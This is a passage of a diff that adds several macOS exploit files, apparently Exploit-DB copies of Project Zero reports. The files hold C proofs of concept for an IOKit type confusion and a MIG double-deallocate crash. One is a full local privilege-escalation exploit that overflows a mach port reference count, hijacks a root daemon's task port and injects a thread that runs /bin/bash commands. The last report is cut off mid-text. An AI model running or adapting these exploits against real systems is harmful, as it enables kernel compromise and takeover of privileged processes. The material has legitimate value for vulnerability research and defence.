+to be connected to a different IOService provider. In this PoC I connect an IGAccelSharedUserClient to
+a AppleBroadcomBluetoothHostController which leads immediately to an invalid virtual call. With more
+investigation I'm sure you could build some very nice exploitation primitives with this bug.
+
+Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
+*/
+
+// ianbeer
+// clang -o wrongclass wrongclass.c -framework IOKit -framework CoreFoundation
+
+#if 0
+MacOS kernel code execution due to writable privileged IOKit registry properties
+
+There are two ways for IOServices to define their IOUserClient classes: they can 
+override IOService::newUserClient and allocate the correct type themselves
+or they can set the IOUserClientClass key in their registry entry.
+
+The default implementation of IOService::newUserClient does this:
+
+  IOReturn IOService::newUserClient( task_t owningTask, void * securityID,
+                                    UInt32 type,  OSDictionary * properties,
+                                    IOUserClient ** handler )
+  {
+      const OSSymbol *userClientClass = 0;
+      IOUserClient *client;
+      OSObject *temp;
+      
+      if (kIOReturnSuccess == newUserClient( owningTask, securityID, type, handler ))
+          return kIOReturnSuccess;
+      
+      // First try my own properties for a user client class name
+      temp = getProperty(gIOUserClientClassKey);
+      if (temp) {
+          if (OSDynamicCast(OSSymbol, temp))
+              userClientClass = (const OSSymbol *) temp;
+          else if (OSDynamicCast(OSString, temp)) {
+              userClientClass = OSSymbol::withString((OSString *) temp);
+              if (userClientClass)
+                  setProperty(kIOUserClientClassKey,
+                              (OSObject *) userClientClass);
+          }
+      }
+      
+      // Didn't find one so lets just bomb out now without further ado.
+      if (!userClientClass)
+          return kIOReturnUnsupported;
+      
+      // This reference is consumed by the IOServiceOpen call
+      temp = OSMetaClass::allocClassWithName(userClientClass);
+      if (!temp)
+          return kIOReturnNoMemory;
+      
+      if (OSDynamicCast(IOUserClient, temp))
+          client = (IOUserClient *) temp;
+      else {
+          temp->release();
+          return kIOReturnUnsupported;
+      }
+      
+      if ( !client->initWithTask(owningTask, securityID, type, properties) ) {
+
+  ... continue on and call client->start(this) to connect the client to the service
+
+This reads the "IOUserClientClass" entry in the services registry entry and uses the IOKit
+reflection API to allocate it.
+
+If an IOService doesn't want to have any IOUserClients then it has two options, either override
+newUserClient to return kIOReturnUnsupported or make sure that there is no IOUserClientClass
+entry in the service's registry entry.
+
+AppleBroadcomBluetoothHostController takes the second approach but inherits from IOBluetoothHostController
+which overrides ::setProperties to allow an unprivileged user to set *all* registry entry properties,
+including IOUserClientClass.
+
+This leads to a very exploitable type confusion issue as plenty of IOUserClient subclasses don't expect
+to be connected to a different IOService provider. In this PoC I connect an IGAccelSharedUserClient to
+a AppleBroadcomBluetoothHostController which leads immediately to an invalid virtual call. With more
+investigation I'm sure you could build some very nice exploitation primitives with this bug.
+
+Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
+
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <mach/mach.h>
+
+#include <IOKit/IOKitLib.h>
+#include <CoreFoundation/CoreFoundation.h>
+
+int main(){
+  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleBroadcomBluetoothHostController"));
+
+  if (service == IO_OBJECT_NULL){
+    printf("unable to find service\n");
+    return 1;
+  }
+  printf("got service: %x\n", service);
+
+	// try to set the prop: 
+	kern_return_t err;
+	err = IORegistryEntrySetCFProperty(
+		service,
+		CFSTR("IOUserClientClass"),
+		CFSTR("IGAccelSharedUserClient"));
+	
+	if (err != KERN_SUCCESS){
+		printf("setProperty failed\n");
+	} else {
+		printf("set the property!!\n");
+  }
+
+  // open a userclient:
+  io_connect_t conn = MACH_PORT_NULL;
+  err = IOServiceOpen(service, mach_task_self(), 0, &conn);
+  if (err != KERN_SUCCESS){
+   printf("unable to get user client connection\n");
+   return 1;
+  }
+
+  printf("got userclient connection: %x\n", conn);
+  
+  return 0;
+}
\ No newline at end of file
diff --git a/platforms/macos/dos/40954.c b/platforms/macos/dos/40954.c
new file mode 100755
index 000000000..de30c342b
--- /dev/null
+++ b/platforms/macos/dos/40954.c
@@ -0,0 +1,180 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40954.zip
+
+Userspace MIG services often use mach_msg_server or mach_msg_server_once to implent an RPC server.
+
+These two functions are also responsible for managing the resources associated with each message
+similar to the ipc_kobject_server routine in the kernel.
+
+If a MIG handler method returns an error code then it is assumed to not have take ownership of any
+of the resources in the message and both mach_msg_server and mach_msg_server_once will pass the message
+to mach_msg_destroy:
+
+If the message had and OOL memory descriptor it reaches this code:
+
+
+  case MACH_MSG_OOL_DESCRIPTOR : {
+    mach_msg_ool_descriptor_t *dsc;
+
+    dsc = &saddr->out_of_line;
+    if (dsc->deallocate) {
+        mach_msg_destroy_memory((vm_offset_t)dsc->address,
+        dsc->size);
+    }
+    break;
+  }
+
+...
+
+  static void
+  mach_msg_destroy_memory(vm_offset_t addr, vm_size_t size)
+  {
+      if (size != 0)
+    (void) vm_deallocate(mach_task_self(), addr, size);
+  }
+
+If the deallocate flag is set in the ool descriptor then this will pass the address contained in the descriptor
+to vm_deallocate.
+
+By default MIG client code passes OOL memory with the copy type set to MACH_MSG_PHYSICAL_COPY which ends up with the
+receiver getting a 0 value for deallocate (meaning that you *do* need vm_deallocate it in the handler even if you return
+and error) but by setting the copy type to MACH_MSG_VIRTUAL_COPY in the sender deallocate will be 1 in the receiver meaning
+that in cases where the MIG handler vm_deallocate's the ool memory and returns an error code the mach_msg_* code will
+deallocate it again.
+
+Exploitability hinges on being able to get the memory reallocated inbetween the two vm_deallocate calls, probably in another thread.
+
+This PoC only demonstrates that an instance of the bug does exist in the first service I looked at,
+com.apple.system.DirectoryService.legacy hosted by /usr/libexec/dspluginhelperd. Trace through in a debugger and you'll see the
+two calls to vm_deallocate, first in _receive_session_create which returns an error code via the MIG reply message then in
+mach_msg_destroy.
+
+Note that this service has multiple threads interacting with mach messages in parallel.
+
+I will have a play with some other services and try to exploit an instance of this bug class but the severity should
+be clear from this PoC alone.
+
+Tested on MacOS Sierra 10.12 16A323
+
+##############################################################################
+
+crash PoC
+
+dspluginhelperd actually uses a global dispatch queue to receive and process mach messages,
+these are by default parallel which makes triggering this bug to demonstrate memory corruption
+quite easy, just talk to the service on two threads in parallel.
+
+Note again that this isn't a report about this particular bug in this service but about the
+MIG ecosystem - the various hand-written equivilents of mach_msg_server* / dispatch_mig_server
+eg in notifyd and lots of other services all have the same issue.
+
+*/
+
+// ianbeer
+// build: clang -o dsplug_parallel dsplug_parallel.c -lpthread
+
+/*
+crash PoC
+
+dspluginhelperd actually uses a global dispatch queue to receive and process mach messages,
+these are by default parallel which makes triggering this bug to demonstrate memory corruption
+quite easy, just talk to the service on two threads in parallel.
+
+Note again that this isn't a report about this particular bug in this service but about the
+MIG ecosystem - the various hand-written equivilents of mach_msg_server* / dispatch_mig_server
+eg in notifyd and lots of other services all have the same issue.
+*/
+
+
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <servers/bootstrap.h>
+#include <mach/mach.h>
+
+char* service_name = "com.apple.system.DirectoryService.legacy";
+
+mach_msg_header_t* msg;
+
+struct dsmsg {
+  mach_msg_header_t hdr;                // +0 (0x18)
+  mach_msg_body_t body;                 // +0x18 (0x4)
+  mach_msg_port_descriptor_t ool_port;  // +0x1c (0xc)
+  mach_msg_ool_descriptor_t ool_data;   // +0x28 (0x10)
+  uint8_t payload[0x8];                 // +0x38 (0x8)
+  uint32_t ool_size;                    // +0x40 (0x4)
+};                                      // +0x44
+
+mach_port_t service_port = MACH_PORT_NULL;
+
+void* do_thread(void* arg) {
+  struct dsmsg* msg = (struct dsmsg*)arg;
+  for(;;){
+    kern_return_t err;
+    err = mach_msg(&msg->hdr,
+                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                   (mach_msg_size_t)sizeof(struct dsmsg),
+                   0,
+                   MACH_PORT_NULL,
+                   MACH_MSG_TIMEOUT_NONE,
+                   MACH_PORT_NULL); 
+    printf("%s\n", mach_error_string(err));
+  }
+  return NULL;
+}
+
+int main() {
+  mach_port_t bs;
+  task_get_bootstrap_port(mach_task_self(), &bs);
+
+  kern_return_t err = bootstrap_look_up(bs, service_name, &service_port);
+  if(err != KERN_SUCCESS){
+    printf("unable to look up %s\n", service_name);
+    return 1;
+  }
+  
+  if (service_port == MACH_PORT_NULL) {
+    printf("bad service port\n");
+    return 1;
+  }
+
+  printf("got port\n");
+  
+  void* ool = malloc(0x100000);
+  memset(ool, 'A', 0x1000);
+
+  struct dsmsg msg = {0};
+
+  msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+  msg.hdr.msgh_remote_port = service_port;
+  msg.hdr.msgh_local_port = MACH_PORT_NULL;
+  msg.hdr.msgh_id = 0x2328; // session_create
+
+  msg.body.msgh_descriptor_count = 2;
+  
+  msg.ool_port.name = MACH_PORT_NULL;
+  msg.ool_port.disposition = 20;
+  msg.ool_port.type = MACH_MSG_PORT_DESCRIPTOR;
+
+  msg.ool_data.address = ool;
+  msg.ool_data.size = 0x1000;
+  msg.ool_data.deallocate = 0; //1;
+  msg.ool_data.copy = MACH_MSG_VIRTUAL_COPY;//MACH_MSG_PHYSICAL_COPY;
+  msg.ool_data.type = MACH_MSG_OOL_DESCRIPTOR;
+
+  msg.ool_size = 0x1000;
+
+  pthread_t threads[2] = {0};
+  pthread_create(&threads[0], NULL, do_thread, (void*)&msg);
+  pthread_create(&threads[1], NULL, do_thread, (void*)&msg);
+
+  pthread_join(threads[0], NULL);
+  pthread_join(threads[1], NULL);
+
+
+  return 0;
+}
diff --git a/platforms/macos/local/40956.c b/platforms/macos/local/40956.c
new file mode 100755
index 000000000..dab4d25c9
--- /dev/null
+++ b/platforms/macos/local/40956.c
@@ -0,0 +1,479 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=941
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40956.zip
+
+The previous ref count overflow bugs were all kinda slow because they were quite deep in kernel code,
+a lot of mach message and MIG code had to run for each leak.
+
+There are a handful of mach operations which have their own fast-path syscalls (mach traps.)
+One of these is _kernelrpc_mach_port_insert_right_trap which lets us create a new mach
+port name in our process from a port we already have. Here's the code:
+
+  int
+  _kernelrpc_mach_port_insert_right_trap(struct _kernelrpc_mach_port_insert_right_args *args)
+  {
+    task_t task = port_name_to_task(args->target);
+    ipc_port_t port;
+    mach_msg_type_name_t disp;
+    int rv = MACH_SEND_INVALID_DEST;
+
+    if (task != current_task())
+      goto done;
+
+    rv = ipc_object_copyin(task->itk_space, args->poly, args->polyPoly,
+        (ipc_object_t *)&port);
+    if (rv != KERN_SUCCESS)
+      goto done;
+    disp =  (args->polyPoly);
+
+    rv = mach_port_insert_right(task->itk_space, args->name, port, disp);
+    
+  done:
+    if (task)
+      task_deallocate(task);
+    return (rv);
+  }
+
+ipc_object_copyin will look up the args->poly name (with the args->polyPoly rights)
+in the current process's mach port namespace and return an ipc_port_t pointer in port.
+
+If ipc_object_copyin is successful it takes a ref on the port and returns that ref to the caller.
+
+mach_port_insert_right will consume that reference but *only* if it succeeds. If it fails then
+no reference is consumed and we can leak one because _kernelrpc_mach_port_insert_right_trap
+doesn't handle the failure case.
+
+it's easy to force mach_port_insert_right to fail by specifying an invalid name for the new
+right (eg MACH_PORT_NULL.)
+
+This allows you to overflow the reference count of the port and cause a kernel UaF in about 20
+minutes using a single thread.
+
+################################################################################
+
+LPE exploit for the kernel ipc_port_t reference leak bug
+
+I wanted to explore some more interesting exploit primitives I could build with this bug.
+
+One idea I had was to turn a send right for a mach port into a receive right for that port.
+We can do this by using the reference count leak to cause a port for which we have a send right
+to be freed (leaving a dangling ipc_object pointer in our ports table and that of any other process
+which had a send right) and forcing the memory to be reallocated with a new port for which we
+hold a receive right.
+
+We could for example target a userspace IPC service and replace a send right we've looked up via
+launchd with a receive right allowing us to impersonate the service to other clients.
+
+Another approach is to target the send rights we can get hold of for kernel-owned ports. In this case
+whilst userspace does still communicate by sending messages the kernel doesn't actually enqueue those
+messages; if a port is owned by the kernel then the send path is short-circuited and the MIG endpoint is
+called directly. Those kernel-owned receive rights are however still ports and we can free them using
+the bug; if we can then get that memory reused as a port for which we hold a receive right we can
+end up impersonating the kernel to other processes!
+
+Lots of kernel MIG apis take a task port as an argument; if we can manage to impersonate one of these
+services we can get other processes to send us their task ports and thus gain complete control over them.
+
+io_service_open_extended is a MIG api on an IOService port. Interestingly we can get a send right to any
+IOService from any sandbox as there are no MAC checks to get an IOService, only to get one of its IOUserClients
+(or query/manipulate the registry entries.) The io_service_open_extended message will be sent to the IOService
+port and the message contains the sender's task port as the owningTask parameter :)
+
+For this PoC expoit I've chosen to target IOBluetoothHCIController because we can control when this will be opened
+by talking to the com.apple.bluetoothaudiod - more exactly when that daemon is started it will call IOServiceOpen.
+We can force the daemon to restart by triggering a NULL pointer deref due to insufficient error checking when it
+parses XPC messages. This doesn't require bluetooth to be enabled.
+
+Putting this all together the flow of the exploit looks like this:
+
+  * get a send right to the IOBluetoothHCIController IOService
+  * overflow the reference count of that ipc_port to 0 and free it
+  * allocate many new receive rights to reuse the freed ipc_port
+  * add the new receive rights to a port set to simplify receiving messages
+  * crash bluetoothaudiod forcing it to restart
+  * bluetoothaudiod will get a send right to what it thinks is the IOBluetoothHCIController IOService
+  * bluetoothaudiod will send its task port to the IOService
+  * the task port is actually sent to us as we have the receive right
+  * we use the task port to inject a new thread into bluetoothsudiod which execs /bin/bash -c COMMAND
+
+Tested on MacOS 10.12 16a323
+
+The technique should work exactly the same on iOS to get a task port for another process from the app sandbox.
+*/
+
+// ianbeer
+
+#if 0
+LPE exploit for the kernel ipc_port_t reference leak bug
+
+I wanted to explore some more interesting exploit primitives I could build with this bug.
+
+One idea I had was to turn a send right for a mach port into a receive right for that port.
+We can do this by using the reference count leak to cause a port for which we have a send right
+to be freed (leaving a dangling ipc_object pointer in our ports table and that of any other process
+which had a send right) and forcing the memory to be reallocated with a new port for which we
+hold a receive right.
+
+We could for example target a userspace IPC service and replace a send right we've looked up via
+launchd with a receive right allowing us to impersonate the service to other clients.
+
+Another approach is to target the send rights we can get hold of for kernel-owned ports. In this case
+whilst userspace does still communicate by sending messages the kernel doesn't actually enqueue those
+messages; if a port is owned by the kernel then the send path is short-circuited and the MIG endpoint is
+called directly. Those kernel-owned receive rights are however still ports and we can free them using
+the bug; if we can then get that memory reused as a port for which we hold a receive right we can
+end up impersonating the kernel to other processes!
+
+Lots of kernel MIG apis take a task port as an argument; if we can manage to impersonate one of these
+services we can get other processes to send us their task ports and thus gain complete control over them.
+
+io_service_open_extended is a MIG api on an IOService port. Interestingly we can get a send right to any
+IOService from any sandbox as there are no MAC checks to get an IOService, only to get one of its IOUserClients
+(or query/manipulate the registry entries.) The io_service_open_extended message will be sent to the IOService
+port and the message contains the sender's task port as the owningTask parameter :)
+
+For this PoC expoit I've chosen to target IOBluetoothHCIController because we can control when this will be opened
+by talking to the com.apple.bluetoothaudiod - more exactly when that daemon is started it will call IOServiceOpen.
+We can force the daemon to restart by triggering a NULL pointer deref due to insufficient error checking when it
+parses XPC messages. This doesn't require bluetooth to be enabled.
+
+Putting this all together the flow of the exploit looks like this:
+
+  * get a send right to the IOBluetoothHCIController IOService
+  * overflow the reference count of that ipc_port to 0 and free it
+  * allocate many new receive rights to reuse the freed ipc_port
+  * add the new receive rights to a port set to simplify receiving messages
+  * crash bluetoothaudiod forcing it to restart
+  * bluetoothaudiod will get a send right to what it thinks is the IOBluetoothHCIController IOService
+  * bluetoothaudiod will send its task port to the IOService
+  * the task port is actually sent to us as we have the receive right
+  * we use the task port to inject a new thread into bluetoothsudiod which execs /bin/bash -c COMMAND
+
+Tested on MacOS 10.12 16a323
+
+The technique should work exactly the same on iOS to get a task port for another process from the app sandbox.
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+
+#include <xpc/xpc.h>
+
+#include <IOKit/IOKitLib.h>
+
+void run_command(mach_port_t target_task, char* command) {
+  kern_return_t err;
+
+  // allocate some memory in the task
+  mach_vm_address_t command_addr = 0;
+  err = mach_vm_allocate(target_task,
+                         &command_addr,
+                         0x1000,
+                         VM_FLAGS_ANYWHERE);
+
+  if (err != KERN_SUCCESS) {
+    printf("mach_vm_allocate: %s\n", mach_error_string(err));
+    return;
+  }
+
+  printf("allocated command at %zx\n", command_addr);
+  uint64_t bin_bash = command_addr;
+  uint64_t dash_c = command_addr + 0x10;
+  uint64_t cmd = command_addr + 0x20;
+  uint64_t argv = command_addr + 0x800;
+
+  uint64_t argv_contents[] = {bin_bash, dash_c, cmd, 0};
+
+  err = mach_vm_write(target_task,
+                      bin_bash,
+                      "/bin/bash",
+                      strlen("/bin/bash") + 1);
+ 
+  err = mach_vm_write(target_task,
+                      dash_c,
+                      "-c",
+                      strlen("-c") + 1);
+
+  err = mach_vm_write(target_task,
+                      cmd,
+                      command,
+                      strlen(command) + 1);
+
+  err = mach_vm_write(target_task,
+                      argv,
+                      argv_contents,
+                      sizeof(argv_contents));
+ 
+  if (err != KERN_SUCCESS) {
+    printf("mach_vm_write: %s\n", mach_error_string(err));
+    return;
+  }
+
+  // create a new thread:
+  mach_port_t new_thread = MACH_PORT_NULL;
+  x86_thread_state64_t state;
+  mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT;
+
+  memset(&state, 0, sizeof(state));
+
+  // the minimal register state we require:
+  state.__rip = (uint64_t)execve;
+  state.__rdi = (uint64_t)bin_bash;
+  state.__rsi = (uint64_t)argv;
+  state.__rdx = (uint64_t)0;
+
+  err = thread_create_running(target_task,
+                              x86_THREAD_STATE64,
+                              (thread_state_t)&state,
+                              stateCount,
+                              &new_thread);
+
+  if (err != KERN_SUCCESS) {
+    printf("thread_create_running: %s\n", mach_error_string(err));
+    return;
+  }
+
+  printf("done?\n");
+}
+
+void force_bluetoothaudiod_restart() {
+  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.bluetoothaudiod", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+
+  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
+    xpc_type_t t = xpc_get_type(event);
+    if (t == XPC_TYPE_ERROR){
+      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
+    }
+    printf("received an event\n");
+  });
+  xpc_connection_resume(conn);
+
+  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
+
+  xpc_dictionary_set_string(msg, "BTMethod", "BTCoreAudioPassthrough");
+
+  xpc_connection_send_message(conn, msg);
+
+  printf("waiting to make sure launchd knows the target has crashed\n");
+  usleep(100000);
+
+  printf("bluetoothaudiod should have crashed now\n");
+
+  xpc_release(msg);
+
+	// connect to the service again and send a message to force it to restart:
+  conn = xpc_connection_create_mach_service("com.apple.bluetoothaudiod", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
+    xpc_type_t t = xpc_get_type(event);
+    if (t == XPC_TYPE_ERROR){
+      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
+    }
+    printf("received an event\n");
+  });
+  xpc_connection_resume(conn);
+
+  msg = xpc_dictionary_create(NULL, NULL, 0);
+
+  xpc_dictionary_set_string(msg, "hello", "world");
+
+  xpc_connection_send_message(conn, msg);
+
+	printf("bluetoothaudiod should be calling IOServiceOpen now\n");
+}
+
+mach_port_t self;
+
+void leak_one_ref(mach_port_t overflower) {
+  kern_return_t err = _kernelrpc_mach_port_insert_right_trap(
+    self,
+    MACH_PORT_NULL, // an invalid name
+    overflower,
+    MACH_MSG_TYPE_COPY_SEND);  
+}
+
+void leak_one_ref_for_receive(mach_port_t overflower) {
+  kern_return_t err = _kernelrpc_mach_port_insert_right_trap(
+    self,
+    MACH_PORT_NULL, // an invalid name
+    overflower,
+    MACH_MSG_TYPE_MAKE_SEND); // if you have a receive right
+}
+
+char* spinners = "-\\|/";
+void leak_n_refs(mach_port_t overflower, uint64_t n_refs) {
+	int step = 0;
+  for (uint64_t i = 0; i < n_refs; i++) {
+    leak_one_ref(overflower);
+    if ((i % 0x40000) == 0) {
+      float done = (float)i/(float)n_refs;
+		 	step = (step+1) % strlen(spinners);
+      fprintf(stdout, "\roverflowing [%c] (%3.3f%%)", spinners[step], done * 100);
+      fflush(stdout);
+    }
+  }
+	fprintf(stdout, "\roverflowed                           \n");
+	fflush(stdout);
+}
+
+// quickly take a release a kernel reference
+// if the reference has been overflowed to 0 this will free the object
+void inc_and_dec_ref(mach_port_t p) {
+  // if we pass something which isn't a task port name:
+  // port_name_to_task 
+  //   ipc_object_copyin
+  //     takes a ref
+  //   ipc_port_release_send
+  //     drops a ref
+
+  _kernelrpc_mach_port_insert_right_trap(p, 0, 0, 0);
+}
+
+/* try to get the free'd port replaced with a new port for which we have
+ * a receive right
+ * Once we've allocated a lot of new ports add them all to a port set so
+ * we can just receive on the port set to find the correct one
+ */
+mach_port_t replace_with_receive() {
+  int n_ports = 2000;
+  mach_port_t ports[n_ports];
+  for (int i = 0; i < n_ports; i++) {
+    mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &ports[i]);
+  }
+
+  // allocate a port set
+  mach_port_t ps;
+  mach_port_allocate(self, MACH_PORT_RIGHT_PORT_SET, &ps);
+  for (int i = 0; i < n_ports; i++) {
+    mach_port_move_member( self, ports[i], ps);
+  }
+  return ps;
+}
+
+/* listen on the port set for io_service_open_extended messages :
+ */
+struct service_open_mig {
+	mach_msg_header_t Head;
+	/* start of the kernel processed data */
+	mach_msg_body_t msgh_body;
+	mach_msg_port_descriptor_t owningTask;
+	mach_msg_ool_descriptor_t properties;
+	/* end of the kernel processed data */
+	NDR_record_t NDR;
+	uint32_t connect_type;
+	NDR_record_t ndr;
+	mach_msg_type_number_t propertiesCnt;
+};
+
+void service_requests(mach_port_t ps) {
+  size_t size = 0x1000;
+  struct service_open_mig* request = malloc(size);
+  memset(request, 0, size);
+
+  printf("receiving on port set\n");
+  kern_return_t err = mach_msg(&request->Head,
+                               MACH_RCV_MSG,
+                               0,
+                               size,
+                               ps,
+                               0,
+                               0);
+
+  if (err != KERN_SUCCESS) {
+    printf("error receiving on port set: %s\n", mach_error_string(err));
+    return;
+  }
+
+  mach_port_t replaced_with = request->Head.msgh_local_port;
+
+  printf("got a message on the port set from port: local(0x%x) remote(0x%x)\n", request->Head.msgh_local_port, request->Head.msgh_remote_port); 	
+	mach_port_t target_task = request->owningTask.name;
+	printf("got task port: 0x%x\n", target_task);
+
+	run_command(target_task, "touch /tmp/hello_from_fake_kernel");
+  
+  printf("did that work?\n");
+	printf("leaking some refs so we don't kernel panic");
+
+	for(int i = 0; i < 0x100; i++) {
+		leak_one_ref_for_receive(replaced_with);
+  }
+
+}
+
+int main() {
+	self = mach_task_self(); // avoid making the trap every time
+
+	//mach_port_t test;
+  //mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &test);
+
+  // get the service we want to target:
+  mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
+  printf("%d : 0x%x\n", getpid(), service);
+
+  // we don't know how many refs the port actually has - lets guess less than 40...
+  uint32_t max_refs = 40;
+  leak_n_refs(service, 0x100000000-max_refs);
+
+  // the port now has a reference count just below 0 so we'll try in a loop
+  // to free it, reallocate and test to see if it worked - if not we'll hope
+  // that was because we didn't free it:
+
+  mach_port_t fake_service_port = MACH_PORT_NULL;
+  for (uint32_t i = 0; i < max_refs; i++) {
+    inc_and_dec_ref(service);
+
+    mach_port_t replacer_ps = replace_with_receive();
+
+    // send a message to the service - if we receive it on the portset then we won:
+    mach_msg_header_t msg = {0};
+    msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
+    msg.msgh_remote_port = service;
+    msg.msgh_id = 0x41414141;
+    msg.msgh_size = sizeof(msg);
+    kern_return_t err;
+    err = mach_msg(&msg,
+                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                   (mach_msg_size_t)sizeof(msg),
+                   0,
+                   MACH_PORT_NULL,
+                   MACH_MSG_TIMEOUT_NONE,
+                   MACH_PORT_NULL);
+    printf("sending probe: %s\n", mach_error_string(err));
+
+    mach_msg_empty_rcv_t reply = {0};
+    mach_msg(&reply.header,
+             MACH_RCV_MSG | MACH_RCV_TIMEOUT,
+             0,
+             sizeof(reply),
+             replacer_ps,
+             1, // 1ms
+             0);
+             
+		if (reply.header.msgh_id == 0x41414141) {
+      // worked:
+      printf("got the probe message\n");
+      fake_service_port = replacer_ps;
+      break;
+    }
+    printf("trying again (%d)\n", i);
+
+    // if it didn't work leak another ref and try again:
+    leak_one_ref(service);
+  }
+
+
+  printf("worked? - forcing a root process to restart, hopefully will send us its task port!\n");
+
+	force_bluetoothaudiod_restart();
+
+  service_requests(fake_service_port);
+
+  return 0;
+}
diff --git a/platforms/macos/local/40957.c b/platforms/macos/local/40957.c
new file mode 100755
index 000000000..80bd80de8
--- /dev/null
+++ b/platforms/macos/local/40957.c
@@ -0,0 +1,771 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=959
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40957.zip
+
+When sending and receiving mach messages from userspace there are two important kernel objects; ipc_entry and
+ipc_object.
+
+ipc_entry's are the per-process handles or names which a process uses to refer to a particular ipc_object.
+
+ipc_object is the actual message queue (or kernel object) which the port refers to.
+
+ipc_entrys have a pointer to the ipc_object they are a handle for along with the ie_bits field which contains
+the urefs and capacility bits for this name/handle (whether this is a send right, receive right etc.)
+
+  struct ipc_entry {
+    struct ipc_object *ie_object;
+    ipc_entry_bits_t ie_bits;
+    mach_port_index_t ie_index;
+    union {
+      mach_port_index_t next;   /* next in freelist, or...  */
+      ipc_table_index_t request;  /* dead name request notify */
+    } index;
+  };
+
+#define IE_BITS_UREFS_MASK  0x0000ffff  /* 16 bits of user-reference */
+#define IE_BITS_UREFS(bits) ((bits) & IE_BITS_UREFS_MASK)
+
+The low 16 bits of the ie_bits field are the user-reference (uref) count for this name.
+
+Each time a new right is received by a process, if it already had a name for that right the kernel will
+increment the urefs count. Userspace can also arbitrarily control this reference count via mach_port_mod_refs
+and mach_port_deallocate. When the reference count hits 0 the entry is free'd and the name can be re-used to
+name another right.
+
+ipc_right_copyout is called when a right will be copied into a space (for example by sending a port right in a mach
+message to another process.) Here's the code to handle the sending of a send right:
+
+    case MACH_MSG_TYPE_PORT_SEND:
+        assert(port->ip_srights > 0);
+        
+        if (bits & MACH_PORT_TYPE_SEND) {
+            mach_port_urefs_t urefs = IE_BITS_UREFS(bits);
+            
+            assert(port->ip_srights > 1);
+            assert(urefs > 0);
+            assert(urefs < MACH_PORT_UREFS_MAX);
+            
+            if (urefs+1 == MACH_PORT_UREFS_MAX) {
+                if (overflow) {
+                    /* leave urefs pegged to maximum */     <---- (1)
+                    
+                    port->ip_srights--;
+                    ip_unlock(port);
+                    ip_release(port);
+                    return KERN_SUCCESS;
+                }
+                
+                ip_unlock(port);
+                return KERN_UREFS_OVERFLOW;
+            }
+            port->ip_srights--;
+            ip_unlock(port);
+            ip_release(port);
+       
+     ...     
+        
+        entry->ie_bits = (bits | MACH_PORT_TYPE_SEND) + 1;  <---- (2)
+        ipc_entry_modified(space, name, entry);
+        break;
+
+
+If copying this right into this space would cause that right's name's urefs count in that space to hit 0xffff
+then (if overflow is true) we reach the code at (1) which claims in the comment that it will leave urefs pegged at maximum.
+This branch doesn't increase the urefs but still returns KERN_SUCCESS. Almost all callers pass overflow=true.
+
+The reason for this "pegging" was probably not to prevent the reference count from becoming incorrect but rather because
+at (2) if the urefs count wasn't capped the reference count would overflow the 16-bit bitfield into the capability bits.
+
+The issue is that the urefs count isn't "pegged" at all. I would expect "pegged" to mean that the urefs count will now stay at 0xfffe
+and cannot be decremented - leaking the name and associated ipc_object but avoiding the possibilty of a name being over-released.
+
+In fact all that the "peg" does is prevent the urefs count from exceeding 0xfffe; it doesn't prevent userspace from believing
+it has more urefs than that (by eg making the copyout's fail.)
+
+What does this actually mean?
+
+Let's consider the behaviour of mach_msg_server or dispatch_mig_server. They receive mach service messages in a loop and if the message
+they receieved didn't corrispond to the MIG schema they pass that received message to mach_msg_destroy. Here's the code where mach_msg_destroy
+destroys an ool_ports_descriptor_t:
+
+    case MACH_MSG_OOL_PORTS_DESCRIPTOR : {
+      mach_port_t                 *ports;
+      mach_msg_ool_ports_descriptor_t *dsc;
+      mach_msg_type_number_t      j;
+
+      /*
+       * Destroy port rights carried in the message 
+       */
+      dsc = &saddr->ool_ports;
+      ports = (mach_port_t *) dsc->address;
+      for (j = 0; j < dsc->count; j++, ports++)  {
+          mach_msg_destroy_port(*ports, dsc->disposition); // calls mach_port_deallocate
+      }
+    ...
+
+This will call mach_port_deallocate for each ool_port name received.
+
+If we send such a service a mach message with eg 0x20000 copies of the same port right as ool ports the ipc_entry for that name will actually only have
+0xfffe urefs. After 0xfffe calls to mach_port_deallocate the urefs will hit 0 and the kernel will free the ipc_entry and mark that name as free. From this
+point on the name can be re-used to name another right (for example by sending another message received on another thread) but the first thread will
+still call mach_port_deallocate 0x10002 times on that name.
+
+This leads to something like a use-after-deallocate of the mach port name - strictly a userspace bug (there's no kernel memory corruption etc here) but
+caused by a kernel bug.
+
+** Doing something interesting **
+
+Here's one example of how this bug could be used to elevate privileges/escape from sandboxes:
+
